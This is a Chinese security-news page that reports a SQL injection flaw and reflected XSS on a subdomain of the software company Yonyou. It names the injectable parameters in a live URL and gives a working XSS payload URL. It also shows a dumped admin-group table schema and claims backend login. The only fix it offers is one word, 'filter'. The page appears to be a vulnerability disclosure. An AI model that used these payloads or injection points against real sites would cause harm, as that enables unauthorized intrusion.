频道栏目
首页 > 资讯 > 网站安全 > 正文

用友分站SQL注入,可登录后台

13-07-23        来源:[db:作者]  
收藏   我要投稿
用友分站SQL注入漏洞,可登录后台
附送反射性XSS一枚
 
http://aud.yonyou.com/php/search.php?keyword=&page=19&tag=1&total_record=943&typeid=1typeid和page参数存在注入
 
 
 
 
http://aud.yonyou.com/php/search.php?keyword=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28941058%29%3C%2fScRiPt%3E&page=1&tag=1&total_record=943&typeid=0
 
这几个参数都存在反射性XSS 
 
 
Database: ufaud_com
Table: cdb_admingroups
[17 columns]
+-------------------+----------------------+
| Column            | Type                 |
+-------------------+----------------------+
| admingid          | smallint(6) unsigned |
| allowbanip        | tinyint(1)           |
| allowbanuser      | tinyint(1)           |
| allowcensorword   | tinyint(1)           |
| allowdelpost      | tinyint(1)           |
| alloweditpoll     | tinyint(1)           |
| alloweditpost     | tinyint(1)           |
| allowedituser     | tinyint(1)           |
| allowmassprune    | tinyint(1)           |
| allowmodpost      | tinyint(1)           |
| allowmoduser      | tinyint(1)           |
| allowpostannounce | tinyint(1)           |
| allowrefund       | tinyint(1)           |
| allowstickthread  | tinyint(1)           |
| allowviewip       | tinyint(1)           |
| allowviewlog      | tinyint(1)           |
| disablepostctrl   | tinyint(1)           |
+-------------------+----------------------+
 
可登录后台
 
 




 
 
反射型XSS
 
修复方案:

过滤 
 
相关TAG标签
上一篇:面试题9:斐波那契数列
下一篇:论升级的重要性,低版本squirrel mail的XSS利用实例
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站